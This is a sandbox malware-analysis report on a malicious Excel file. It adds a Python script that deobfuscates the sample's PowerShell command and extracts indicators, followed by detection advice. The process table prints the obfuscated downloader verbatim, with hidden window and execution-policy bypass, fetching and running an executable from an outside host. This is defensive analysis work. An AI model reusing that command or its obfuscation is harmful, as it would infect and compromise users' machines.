Field | Value
---|---
File name | d0013b66a66c4035f337023fb12d6fe79e567225267b442f8a744a02c8caddca.xls
Full analysis | https://app.any.run/tasks/53d9e58e-c2c9-4b00-bf3e-bc67f03e6891
Verdict | Malicious activity
Analysis date | March 21, 2019, 02:53:12
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | application/CDFV2
File info | Composite Document File V2 Document, Cannot read short stream
MD5 | BE84253E519772C0594ABB52A1B6F0B2
SHA1 | 5E1DF020AB5DD5B4EA14A6067737193B95F51981
SHA256 | D0013B66A66C4035F337023FB12D6FE79E567225267B442F8A744A02C8CADDCA
SSDEEP | 1536:8+WxEtjPOtioVjDGUU1qfDlaGGx+cLYIxreo8fHzIOz/smD:8+WxEtjPOtioVjDGUU1qfDlaGGx+cLYd
Extension | File type | Match (%)
---|---|---
.xls | Microsoft Excel sheet | 48
.xls | Microsoft Excel sheet (alternate) | 39.2
PID | Parent process | CMD | Path | Indicators | User | Integrity level | Description | Company | Version
---|---|---|---|---|---|---|---|---|---
1896 | explorer.exe | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | admin | MEDIUM | Microsoft Excel | Microsoft Corporation | 14.0.6024.1000
1296 | EXCEL.EXE | cmd /c"pOWeRshELl -nopRoFi -WIn hiDDEN -NOLo -noNInTeRA -eXeCUTIoNp bYpass "$7d0mK6 = [TypE](\"{1}{0}{3}{2}\" -f 'on','EnVIr','Nt','ME') ; do{&(\"{1}{0}\" -f'ep','sle') 33;${D`es} = $7d0mk6::gETfoLDeRpaTh(\"Desktop\");(&(\"{0}{1}{2}\" -f'Ne','w-','Object') (\"{0}{2}{1}{3}{5}{6}{4}\"-f'Sy','te','s','m.Ne','ent','t.Web','Cli')).dowNLOadFiLE.iNVoKE(\"https://greatwe.date/pagino\",\"$Des\334784.exe\")}while(!${?});&(\"{0}{2}{3}{1}\"-f 'St','ocess','art','-Pr') $Des\334784.exe" | C:\Windows\system32\cmd.exe | — | admin | MEDIUM | Windows Command Processor | Microsoft Corporation | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2760 | cmd.exe | pOWeRshELl -nopRoFi -WIn hiDDEN -NOLo -noNInTeRA -eXeCUTIoNp bYpass "$7d0mK6 = [TypE](\"{1}{0}{3}{2}\" -f 'on','EnVIr','Nt','ME') ; do{&(\"{1}{0}\" -f'ep','sle') 33;${D`es} = $7d0mk6::gETfoLDeRpaTh(\"Desktop\");(&(\"{0}{1}{2}\" -f'Ne','w-','Object') (\"{0}{2}{1}{3}{5}{6}{4}\"-f'Sy','te','s','m.Ne','ent','t.Web','Cli')).dowNLOadFiLE.iNVoKE(\"https://greatwe.date/pagino\",\"$Des\334784.exe\")}while(!${?});&(\"{0}{2}{3}{1}\"-f 'St','ocess','art','-Pr') $Des\334784.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | admin | MEDIUM | Windows PowerShell | Microsoft Corporation | 6.1.7600.16385 (win7_rtm.090713-1255)
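The PID 2760 command line in the process tree is obfuscated with three cheap tricks: every cmdlet and type name is assembled at runtime with PowerShell's `-f` format operator using a shuffled index order, the variable `$Des` is written as `${D`es}`, and switches and identifiers use random casing with abbreviated switch names. The script below is an added example, not part of the ANY.RUN report and not the sample's own code. It folds those layers back into a readable command line and pulls out the download URL and drop path. Its only input is the command line copied verbatim from the table; the `SWITCHES` and `CANON` lists are this example's assumptions about powershell.exe, not data from the report.

```python
"""Fold the -f format-operator obfuscation out of the PID 2760 PowerShell
command line and extract its indicators. Added example, not the report's code."""
import re

# Constructed input: the PID 2760 command line copied verbatim from the report above.
SAMPLE_CMDLINE = r'''pOWeRshELl -nopRoFi -WIn hiDDEN -NOLo -noNInTeRA -eXeCUTIoNp bYpass "$7d0mK6 = [TypE](\"{1}{0}{3}{2}\" -f 'on','EnVIr','Nt','ME') ; do{&(\"{1}{0}\" -f'ep','sle') 33;${D`es} = $7d0mk6::gETfoLDeRpaTh(\"Desktop\");(&(\"{0}{1}{2}\" -f'Ne','w-','Object') (\"{0}{2}{1}{3}{5}{6}{4}\"-f'Sy','te','s','m.Ne','ent','t.Web','Cli')).dowNLOadFiLE.iNVoKE(\"https://greatwe.date/pagino\",\"$Des\334784.exe\")}while(!${?});&(\"{0}{2}{3}{1}\"-f 'St','ocess','art','-Pr') $Des\334784.exe'''

# One parenthesised format expression, e.g. ("{1}{0}" -f 'ep','sle'). The quotes
# arrive escaped as \" because the line was passed through cmd /c first.
FMT_RE = re.compile(
    r'''\(\s*\\?"(?P<fmt>(?:\{\d+\})+)\\?"\s*-f\s*'''
    r'''(?P<args>'[^']*'(?:\s*,\s*'[^']*')*)\s*\)''', re.IGNORECASE)

# powershell.exe accepts any unambiguous prefix of a switch (assumed list, not from the report).
SWITCHES = ["-NoProfile", "-WindowStyle", "-NoLogo", "-NonInteractive",
            "-ExecutionPolicy", "-EncodedCommand", "-Command", "-File", "-NoExit"]

# Identifiers PowerShell matches case-insensitively, in their canonical spelling (assumed list).
CANON = ["powershell", "Environment", "New-Object", "System.Net.WebClient",
         "Start-Process", "GetFolderPath", "DownloadFile", "Hidden", "Bypass"]


def resolve_format(fmt, args):
    """Evaluate the -f operator for a format string made only of {i} slots."""
    return re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))], fmt)


def expand_switch(token):
    """Expand an abbreviated switch (-nopRoFi -> -NoProfile); leave ambiguous ones alone."""
    hits = [s for s in SWITCHES if s.lower().startswith(token.lower())]
    return hits[0] if len(hits) == 1 else token


def deobfuscate(cmdline):
    """Return the command line with each obfuscation layer folded away."""
    def fold(m):
        args = re.findall(r"'([^']*)'", m.group("args"))
        return "'" + resolve_format(m.group("fmt"), args) + "'"
    # 1. ("{1}{0}" -f 'ep','sle') -> 'sleep'
    text = FMT_RE.sub(fold, cmdline)
    # 2. [Type]'Name' is just [Name]; &'Name' is a plain command invocation.
    text = re.sub(r"\[type\]'([^']*)'", r"[\1]", text, flags=re.IGNORECASE)
    text = re.sub(r"&'([^']*)'", r"\1", text)
    # 3. ${D`es} -> $Des and ${?} -> $?: braces and backticks only hide the name.
    text = re.sub(r"\$\{([^}]*)\}", lambda m: "$" + m.group(1).replace("`", ""), text)
    # 4. .Method.Invoke(args) -> .Method(args); drop the cmd.exe-level \" escapes.
    text = re.sub(r"\.invoke\(", "(", text, flags=re.IGNORECASE).replace('\\"', '"')
    # 5. Restore readable casing, then expand the abbreviated powershell.exe switches.
    for name in CANON:
        text = re.sub(re.escape(name), name, text, flags=re.IGNORECASE)
    return re.sub(r"(?<!\S)-[A-Za-z]+", lambda m: expand_switch(m.group(0)), text)


def extract_iocs(script):
    """Pull out the indicators a responder would block or hunt for."""
    return {
        "urls": sorted(set(re.findall(r"https?://[^\s\"']+", script))),
        "drop_paths": sorted(set(re.findall(r"\$\w+\\[\w.]+\.exe", script))),
        "behaviours": [n for n in ("DownloadFile", "Start-Process", "Bypass") if n in script],
    }


if __name__ == "__main__":
    clean = deobfuscate(SAMPLE_CMDLINE)
    print(clean)
    print(extract_iocs(clean))
```

Running it prints the readable form: a `do { sleep 33; ... DownloadFile(...) } while (!$?)` retry loop that keeps fetching `https://greatwe.date/pagino` until the download succeeds, writes it to `$Des\334784.exe` on the Desktop, and then runs it with `Start-Process`. The retry loop is why the sandbox shows the connection to greatwe.date from PID 2760 and why a failed first request does not stop the chain. Static detection that matches on cmdlet names would miss this command line; matching on the `-f` operator combined with `{n}` slot strings, or on the EXCEL.EXE to cmd.exe to powershell.exe parent chain, does not.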
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
1896 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8B9D.tmp.cvr | — | — | —
2760 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PWGXIH2RTNGRJ1OFL0MV.temp | — | — | —
2760 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
2760 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf9820.TMP | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2760 | powershell.exe | 89.18.27.183:443 | greatwe.date | Optic Bridge SRL | RO | suspicious |
Domain | IP | Reputation
---|---|---
greatwe.date | | malicious